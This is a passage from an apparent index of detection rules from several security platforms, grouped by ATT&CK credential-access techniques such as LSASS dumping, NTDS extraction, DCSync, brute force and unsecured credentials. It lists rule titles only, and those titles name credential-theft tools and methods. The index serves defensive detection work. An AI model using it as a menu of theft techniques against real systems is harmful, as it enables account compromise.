- Sigma Dumping Process via Sqldumper.exe test
- Sigma DumpMinitool Execution test
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Sigma HackTool - CrackMapExec File Indicators test
- Sigma HackTool - CrackMapExec Process Patterns test
- Sigma HackTool - CreateMiniDump Execution test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Doppelanger LSASS Dumper Execution experimental
- Sigma HackTool - Dumpert Process Dumper Default File test
- YARA-L HackTool - Dumpert Process Dumper Default File
- Sigma HackTool - Dumpert Process Dumper Execution test
- YARA-L HackTool - Dumpert Process Dumper Execution
- Sigma HackTool - Generic Process Access test
- YARA-L HackTool - Generic Process Access
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - HandleKatz LSASS Dumper Execution test
- Sigma HackTool - Impacket File Indicators experimental
- Sigma HackTool - Inveigh Execution test
- Sigma HackTool - Mimikatz Execution test
- YARA-L HackTool - Mimikatz Execution
- Sigma HackTool - SafetyKatz Dump Indicator test
- Sigma HackTool - SafetyKatz Execution test
- Sigma HackTool - Windows Credential Editor (WCE) Execution test
- Sigma HackTool - WSASS Execution experimental
- Sigma HackTool - XORDump Execution test
- Sigma LSASS Access Detected via Attack Surface Reduction test
- Sigma LSASS Access From Non System Account test
- Sigma LSASS Access From Potentially White-Listed Processes test
- Sigma LSASS Access From Program In Potentially Suspicious Folder test
- Sigma LSASS credential dump with LSASSY (admin share) experimental
- Sigma LSASS credential dump with LSASSY (kernel access) experimental
- Sigma LSASS credential dump with LSASSY (PowerShell) experimental
- Sigma LSASS credential dump with LSASSY (process) experimental
- Sigma LSASS Dump Keyword In CommandLine test
- YARA-L LSASS Dump Keyword In CommandLine
- Sigma LSASS dump via process access experimental
- Kusto LSASS Dumping using Debug Privileges
- Sigma Lsass Full Dump Request Via DumpType Registry Settings test
- Splunk LSASS Handle request (Windows Event Log)
- Sigma LSASS Memory Access by Tool With Dump Keyword In Name test
- YARA-L LSASS Memory Access by Tool With Dump Keyword In Name
- Elastic LSASS Memory Dump Handle Access production
- Sigma Lsass Memory Dump via Comsvcs DLL test
- YARA-L Lsass Memory Dump via Comsvcs DLL
- Sigma LSASS Process Crashed - Application experimental
- Sigma LSASS Process Dump Artefact In CrashDumps Folder test
- Sigma LSASS process dump by a non system account experimental
- Sigma LSASS Process Memory Dump Creation Via Taskmgr.EXE test
- YARA-L LSASS Process Memory Dump Creation Via Taskmgr.exe
- Sigma LSASS Process Memory Dump Files test
- YARA-L LSASS Process Memory Dump Files
- Elastic Memory Dump File with Unusual Extension production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Elastic Modification of WDigest Security Provider production
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Sigma NotPetya Ransomware Activity test
- Sigma Password Dumper Activity on LSASS test
- Sigma Password Dumper Remote Thread in LSASS stable
- Sigma Potential Adplus.EXE Abuse test
- Elastic Potential Credential Access via DuplicateHandle in LSASS production
- Elastic Potential Credential Access via LSASS Memory Dump production
- Elastic Potential Credential Access via Memory Dump File Creation production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Credential Dumping Activity Via LSASS test
- YARA-L Potential Credential Dumping Activity Via LSASS
- Sigma Potential Credential Dumping Attempt Via PowerShell test
- Sigma Potential Credential Dumping Attempt Via PowerShell Remote Thread test
- Sigma Potential Credential Dumping Via LSASS Process Clone test
- Sigma Potential Credential Dumping Via LSASS SilentProcessExit Technique test
- YARA-L Potential Credential Dumping Via LSASS SilentProcessExit Technique
- Sigma Potential Credential Dumping Via WER test
- Elastic Potential LSASS Clone Creation via PssCaptureSnapShot production
- Elastic Potential LSASS Memory Dump via PssCaptureSnapShot production
- Sigma Potential LSASS Process Dump Via Procdump stable
- YARA-L potential lsass process dump via procdump
- Sigma Potential SAM database user credentials dumped with DCshadow experimental
- Sigma Potential SysInternals ProcDump Evasion test
- Sigma Potential Windows Defender AV Bypass Via Dump64.EXE Rename test
- Sigma Potentially Suspicious AccessMask Requested From LSASS test
- Sigma Potentially Suspicious GrantedAccess Flags On LSASS test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS in ScriptBlock test
- Sigma PPL Tampering Via WerFaultSecure experimental
- Splunk ProcDump Credential Harvest (Sysmon)
- Splunk ProcDump Credential Harvest (Windows Event Log)
- Sigma Procdump Execution test
- Sigma Process Access via TrolleyExpress Exclusion test
- Sigma Process Memory Dump Via Comsvcs.DLL test
- YARA-L Process Memory Dump Via Comsvcs.DLL
- Sigma Process Memory Dump via RdrLeakDiag.EXE test
- YARA-L Process Memory Dump via RdrLeakDiag.exe
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk pypykatz commands (Windows Event Log)
- Splunk RdrLeakDiag.exe Memory Dump (PowerShell)
- Splunk RdrLeakDiag.exe Memory Dump (Sysmon)
- Splunk RdrLeakDiag.exe Memory Dump (Windows Event Log)
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Renamed CreateDump Utility Execution test
- YARA-L Renamed CreateDump Utility Execution
- Sigma SAM database user credentials dump with Mimikatz experimental
- Sigma Suspicious DumpMinitool Execution test
- Sigma Suspicious LSASS Access Via MalSecLogon test
- Elastic Suspicious LSASS Access via MalSecLogon production
- Elastic Suspicious Lsass Process Access production
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious Renamed Comsvcs DLL Loaded By Rundll32 test
- Sigma Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded test
- Sigma Task Manager access indicator for potential LSASS dump experimental
- Splunk Task Manager lsass Dump (Windows Event Log)
- Sigma Task Manager used for LSASS dump (kernel) experimental
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Uncommon GrantedAccess Flags On LSASS test
- Sigma Unsigned Image Loaded Into LSASS Process test
- Sigma WerFault LSASS Process Memory Dump test
- Splunk Windows Credential Dumping LSASS Memory Createdump production
- Sigma Windows Credential Editor Registry test
- Splunk Windows Hunting System Account Targeting Lsass production
- Splunk Windows Non-System Account Targeting Lsass production
- Splunk Windows Possible Credential Dumping production
OS Credential Dumping: Security Account Manager T1003.002 48 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Crash Dump Created By Operating System experimental
- Sigma Cred Dump Tools Dropped Files test
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Critical Hive In Suspicious Location Access Bits Cleared test
- Splunk Detect Copy of ShadowCopy with Script Block Logging production
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Splunk Esentutl SAM Copy production
- Sigma Esentutl Volume Shadow Copy Service Keys test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Sigma HackTool - Pypykatz Credentials Dumping Activity test
- Sigma HackTool - Quarks PwDump Execution test
- Sigma HackTool - QuarksPwDump Dump File test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Elastic NTDS Dump via Wbadmin production
- Elastic NTDS or SAM Database File Copied production
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Remote Credential Access via Registry production
- Sigma Potential SAM Database Dump test
- Sigma PowerShell SAM Copy test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk SAM Database File Access Attempt production
- Splunk SAM, System, Security Files Accessed (Windows Event Log)
- Sigma Secretdump password dumping via SMB admin share experimental
- Splunk SecretsDump Credential Harvest (Windows Event Log)
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Volume Shadow Copy Mount test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
- Sigma VSSAudit Security Event Source Registration test
- Splunk Windows Rapid Authentication On Multiple Hosts production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Sensitive Registry Hive Dump Via CommandLine production
OS Credential Dumping: NTDS T1003.003 54 rules
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Create Volume Shadow Copy with Powershell test
- Splunk Creation of Shadow Copy production
- Splunk Creation of Shadow Copy with wmic and powershell production
- Sigma Cred Dump Tools Dropped Files test
- Splunk Credential Dumping via Copy Command from Shadow Copy production
- Splunk Credential Dumping via Symlink to Shadow Copy production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Esentutl Gather Credentials test
- Sigma IFM creation detected from commandline (installation from media) experimental
- Sigma IFM detected - ESENT (installation from media) experimental
- Sigma Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) test
- YARA-L MITRE ATT&CK T1003.003 RW Utilities Associated With Ntds.dit
- YARA-L MITRE ATT&CK T1003.003 WMIC Ntds.dit CISA Report
- Elastic NTDS Dump via Wbadmin production
- Sigma NTDS Exfiltration Filename Patterns test
- Elastic NTDS or SAM Database File Copied production
- Splunk ntds.dit Access from Unexpected Location (Sysmon)
- Splunk ntds.dit Access from Unexpected Location (Windows Event Log)
- Splunk ntds.dit Command Line (PowerShell)
- Splunk ntds.dit Command Line (Sysmon)
- Splunk ntds.dit Command Line (Windows Event Log)
- Sigma NTDS.DIT Created test
- Sigma NTDS.DIT Creation By Uncommon Parent Process test
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Ntdsutil Abuse test
- Splunk Ntdsutil Export NTDS production
- Splunk NTDSUtil.exe execution (Sysmon)
- Splunk NTDSUtil.exe execution (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma PUA - DIT Snapshot Viewer test
- Splunk SecretDumps Offline NTDS Dumping Tool production
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Sensitive File Dump Via Wbadmin.EXE test
- Sigma Sensitive File Recovery From Backup Via Wbadmin.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Splunk Shadow Copy Created (Windows Event Log)
- Sigma Suspicious Get-ADDBAccount Usage test
- Splunk Suspicious ntds.dit Commands (PowerShell)
- Splunk Suspicious ntds.dit Commands (Sysmon)
- Splunk Suspicious ntds.dit Commands (Windows Event Log)
- Sigma Suspicious Process Patterns NTDS.DIT Exfil test
- Sigma Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
OS Credential Dumping: LSA Secrets T1003.004 16 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Cred Dump Tools Dropped Files test
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma DPAPI Domain Backup Key Extraction test
- Sigma DPAPI Domain Master Key Backup Attempt test
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Splunk Windows LSA Secrets NoLMhash Registry production
OS Credential Dumping: Cached Domain Credentials T1003.005 13 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Cred Dump Tools Dropped Files test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Sigma New Generic Credentials Added Via Cmdkey.EXE test
- Sigma Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE test
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Splunk Windows Cached Domain Credentials Reg Query production
OS Credential Dumping: DCSync T1003.006 19 rules
- Sigma Active Directory Replication from Non Machine Account test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Splunk Excessive DRSGetNCChanges Requests (Windows Event Log)
- Sigma Exchange group membership change to perform DCsync attack experimental
- Elastic First Time Seen Account Performing DCSync production
- Sigma HackTool - Mimikatz Execution test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Mimikatz DC Sync test
- Sigma NetSYnc attack experimental
- Kusto Non Domain Controller Active Directory Replication available
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Credential Access via DCSync production
- Splunk Potential DCSync (Windows Event Log)
- Sigma Replication privileges accessed to perform DCSync attack experimental
- Sigma Suspicious Get-ADReplAccount test
- Splunk Windows AD Replication Request Initiated by User Account production
- Splunk Windows AD Replication Request Initiated from Unsanctioned Location production
OS Credential Dumping: /etc/passwd and /etc/shadow T1003.008 1 rule
- Elastic Suspicious Execution via Windows Subsystem for Linux production
Network Sniffing T1040 9 rules
- Sigma Harvesting Of Wifi Credentials Via Netsh.EXE test
- Sigma New Network Trace Capture Started Via Netsh.EXE test
- Sigma PktMon.EXE Execution test
- Sigma Potential Network Sniffing Activity Using Network Tools test
- Sigma Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Windows native Pktmon sniffer abuse experimental
- Sigma Windows Pcap Drivers test
- Sigma Windows traffic capture abuse experimental
Input Capture T1056 10 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma DNS Query Request To OneLaunch Update Service test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Keylogging T1056.001 3 rules
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
Input Capture: GUI Input Capture T1056.002 3 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Credential API Hooking T1056.004 4 rules
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Brute Force T1110 45 rules
- Kusto Brute force attack against user credentials (Uses Authentication Normalization)
- Splunk Detect Password Spray Attack Behavior From Source production
- Splunk Detect Password Spray Attack Behavior On User production
- Splunk Detect Password Spray Attempts production
- Kusto Excessive Windows Logon Failures available
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Kusto Failed logon attempts by valid accounts within 10 mins
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - Hashcat Password Cracker Execution test
- Sigma HackTool - Hydra Password Bruteforce Execution test
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One With User Entity
- YARA-L MITRE ATT&CK T1110.003 RW Windows Password Spray
- Splunk Multiple Failed Network Logon Attempts from Host (Windows Event Log)
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Kusto Multiple Password Reset by user
- Kusto Password Spraying available
- Splunk Password Spraying Windows (Windows Event Log)
- Kusto Potential Password Spray Attack (Uses Authentication Normalization)
- Elastic Privileged Accounts Brute Force production
- Splunk RDP Brute-force Detection (Windows Event Log)
- Kusto Remote Desktop Network Brute force (ASIM Network Session schema) available
- Kusto SecurityEvent - Multiple authentication failures followed by a success available
- Sigma Suspicious Connection to Remote Account test
- Splunk Suspicious Login Failures (Windows Event Log)
- Splunk Windows Local Administrator Credential Stuffing production
- Splunk Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos production
- Splunk Windows Multiple Invalid Users Fail To Authenticate Using Kerberos production
- Splunk Windows Multiple Invalid Users Failed To Authenticate Using NTLM production
- Splunk Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials production
- Splunk Windows Multiple Users Failed To Authenticate From Host Using NTLM production
- Splunk Windows Multiple Users Failed To Authenticate From Process production
- Splunk Windows Multiple Users Failed To Authenticate Using Kerberos production
- Splunk Windows Multiple Users Remotely Failed To Authenticate From Host production
- Splunk Windows Remote Desktop Network Bruteforce Attempt production
- Splunk Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM production
- Splunk Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials production
- Splunk Windows Unusual Count Of Users Failed To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Users Failed To Authenticate From Process production
- Splunk Windows Unusual Count Of Users Failed To Authenticate Using NTLM production
- Splunk Windows Unusual Count Of Users Remotely Failed To Auth From Host production
Brute Force: Password Guessing T1110.001 10 rules
- Sigma HackTool - Hydra Password Bruteforce Execution test
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One With User Entity
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Elastic Privileged Accounts Brute Force production
- Splunk RDP Brute-force Detection (Windows Event Log)
- Sigma Suspicious Connection to Remote Account test
- Splunk Suspicious Login Failures (Windows Event Log)
- Splunk Windows Remote Desktop Network Bruteforce Attempt production
Brute Force: Password Spraying T1110.003 26 rules
- Splunk Detect Password Spray Attack Behavior From Source production
- Splunk Detect Password Spray Attack Behavior On User production
- Splunk Detect Password Spray Attempts production
- YARA-L MITRE ATT&CK T1110.003 RW Windows Password Spray
- Splunk Multiple Failed Network Logon Attempts from Host (Windows Event Log)
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Kusto Password Spraying available
- Splunk Password Spraying Windows (Windows Event Log)
- Elastic Privileged Accounts Brute Force production
- Splunk Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos production
- Splunk Windows Multiple Invalid Users Fail To Authenticate Using Kerberos production
- Splunk Windows Multiple Invalid Users Failed To Authenticate Using NTLM production
- Splunk Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials production
- Splunk Windows Multiple Users Failed To Authenticate From Host Using NTLM production
- Splunk Windows Multiple Users Failed To Authenticate From Process production
- Splunk Windows Multiple Users Failed To Authenticate Using Kerberos production
- Splunk Windows Multiple Users Remotely Failed To Authenticate From Host production
- Splunk Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM production
- Splunk Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials production
- Splunk Windows Unusual Count Of Users Failed To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Users Failed To Authenticate From Process production
- Splunk Windows Unusual Count Of Users Failed To Authenticate Using NTLM production
- Splunk Windows Unusual Count Of Users Remotely Failed To Auth From Host production
Brute Force: Credential Stuffing T1110.004 1 rule
- Splunk Windows Local Administrator Credential Stuffing production
Forced Authentication T1187 21 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Splunk DNS Kerberos Coercion production
- Sigma NTLM Hash Leak Via Curl NTLM Authentication test
- Kusto NTLM Relay Attack
- Splunk PetitPotam Network Share Access Request production
- Sigma PetitPotam Suspicious Kerberos TGT Request test
- Sigma Possible PetitPotam Coerce Authentication Attempt test
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI test
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Exploitation for Credential Access T1212 6 rules
- Sigma Audit CVE Event test
- Sigma GALLIUM IOCs test
- Sigma Kerberos Manipulation test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Suspicious NTLM Authentication on the Printer Spooler Service test
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
Steal Web Session Cookie T1539 3 rules
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma SQLite Chromium Profile Data DB Access test
- Sigma SQLite Firefox Profile Data DB Access test
Unsecured Credentials T1552 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Splunk Add DefaultUser And Password In Registry production
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- YARA-L ADFS DKM Key Access
- Elastic Attempted Private Key Access production
- Splunk Attempted Veeam Database Credential Dump (PowerShell)
- Splunk Attempted Veeam Database Credential Dump (Sysmon)
- Splunk Attempted Veeam Database Credential Dump (Windows Event Log)
- Splunk Auto Admin Logon Registry Entry production
- Sigma Automated Collection Command Prompt test
- Sigma Certificate Exported Via PowerShell test
- Sigma Certificate Exported Via PowerShell - ScriptBlock test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Credentials in Registry (Windows Event Log)
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
- Sigma Enumeration for 3rd Party Creds From CLI test
- Sigma Enumeration for Credentials in Registry test
- Sigma EventLog Query Requests By Builtin Utilities test
- Sigma Extracting Information with PowerShell test
- Sigma Findstr GPP Passwords test
- Sigma HackTool - Typical HiveNightmare SAM File Export test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Locate Credentials (PowerShell)
- Splunk Locate Credentials (Sysmon)
- Splunk Locate Credentials (Windows Event Log)
- Sigma LSASS Process Reconnaissance Via Findstr.EXE test
- Elastic Microsoft IIS Connection Strings Decryption production
- Elastic Microsoft IIS Service Account Password Dumped production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk Mimikatz Execution (Windows Event Log)
- Sigma Permission Misconfiguration Reconnaissance Via Findstr.EXE test
- Sigma PFX File Creation test
- Sigma Potential Password Reconnaissance Via Findstr.EXE test
- Sigma Potential PowerShell Console History Access Attempt via History File experimental
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potentially Suspicious EventLog Recon Activity Using Log Query Utilities test
- Sigma Potentially Suspicious JWT Token Search Via CLI test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS test
- Sigma Private Keys Reconnaissance Via CommandLine Tools test
- Sigma PUA - TruffleHog Execution experimental
- Sigma Registry Export of Third-Party Credentials experimental
- Sigma Remote File Download Via Findstr.EXE test
- Sigma SAM Registry Hive Handle Request test
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Elastic Suspicious CertUtil Commands production
- Sigma Suspicious SYSVOL Domain Group Policy Access test
- Splunk Windows Credentials in Registry Reg Query production
- Splunk Windows Export Certificate production
- Splunk Windows Findstr GPP Discovery production
- Splunk Windows LAPS Password Gathering Via PowerShell Script production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows PowerSploit GPP Discovery production
- Splunk Windows Private Keys Discovery production
- Splunk Windows Unsecured Outlook Credentials Access In Registry production
- Splunk Windows Unusual FileZilla XML Config Access production
- Splunk Windows Unusual Intelliform Storage Registry Access production
- Elastic Wireless Credential Dumping using Netsh Command production
Unsecured Credentials: Credentials In Files T1552.001 30 rules
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Splunk Attempted Veeam Database Credential Dump (PowerShell)
- Splunk Attempted Veeam Database Credential Dump (Sysmon)
- Splunk Attempted Veeam Database Credential Dump (Windows Event Log)
- Sigma Automated Collection Command Prompt test
- Sigma Extracting Information with PowerShell test
- Sigma HackTool - Typical HiveNightmare SAM File Export test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Locate Credentials (PowerShell)
- Splunk Locate Credentials (Sysmon)
- Splunk Locate Credentials (Windows Event Log)
- Elastic Microsoft IIS Connection Strings Decryption production
- Elastic Microsoft IIS Service Account Password Dumped production
- Sigma Potential Password Reconnaissance Via Findstr.EXE test
- Sigma Potential PowerShell Console History Access Attempt via History File experimental
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potentially Suspicious JWT Token Search Via CLI test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - TruffleHog Execution experimental
- Sigma Remote File Download Via Findstr.EXE test
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Splunk Windows Unusual FileZilla XML Config Access production
- Splunk Windows Unusual Intelliform Storage Registry Access production
- Elastic Wireless Credential Dumping using Netsh Command production
Unsecured Credentials: Credentials in Registry T1552.002 10 rules
- Splunk Add DefaultUser And Password In Registry production
- Splunk Auto Admin Logon Registry Entry production
- Splunk Credentials in Registry (Windows Event Log)
- Sigma Enumeration for 3rd Party Creds From CLI test
- Sigma Enumeration for Credentials in Registry test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Registry Export of Third-Party Credentials experimental
- Sigma SAM Registry Hive Handle Request test
- Splunk Windows Credentials in Registry Reg Query production
Unsecured Credentials: Private Keys T1552.004 15 rules
- Elastic Access to a Sensitive LDAP Attribute production
- YARA-L ADFS DKM Key Access
- Elastic Attempted Private Key Access production
- Sigma Certificate Exported Via PowerShell test
- Sigma Certificate Exported Via PowerShell - ScriptBlock test
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
- Sigma PFX File Creation test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS test
- Sigma Private Keys Reconnaissance Via CommandLine Tools test
- Elastic Suspicious CertUtil Commands production
- Splunk Windows Export Certificate production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows Private Keys Discovery production
Unsecured Credentials: Group Policy Preferences T1552.006 6 rules
- Sigma Findstr GPP Passwords test
- Sigma LSASS Process Reconnaissance Via Findstr.EXE test
- Sigma Permission Misconfiguration Reconnaissance Via Findstr.EXE test
- Sigma Suspicious SYSVOL Domain Group Policy Access test
- Splunk Windows Findstr GPP Discovery production
- Splunk Windows PowerSploit GPP Discovery production
Credentials from Password Stores T1555 44 rules
- Sigma Access To Browser Credential Files By Uncommon Applications - Security test
- Sigma Access to Browser Login Data test
- Sigma Azure Active Directory Connect credentials dump via network share experimental
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma Credentials (protected by DPAPI) dump via network share experimental
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
- Sigma Dump Credentials from Windows Credential Manager With PowerShell test
- Sigma Enumerate Credentials from Windows Credential Manager With PowerShell test
- Sigma HackTool - SecurityXploded Execution stable
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
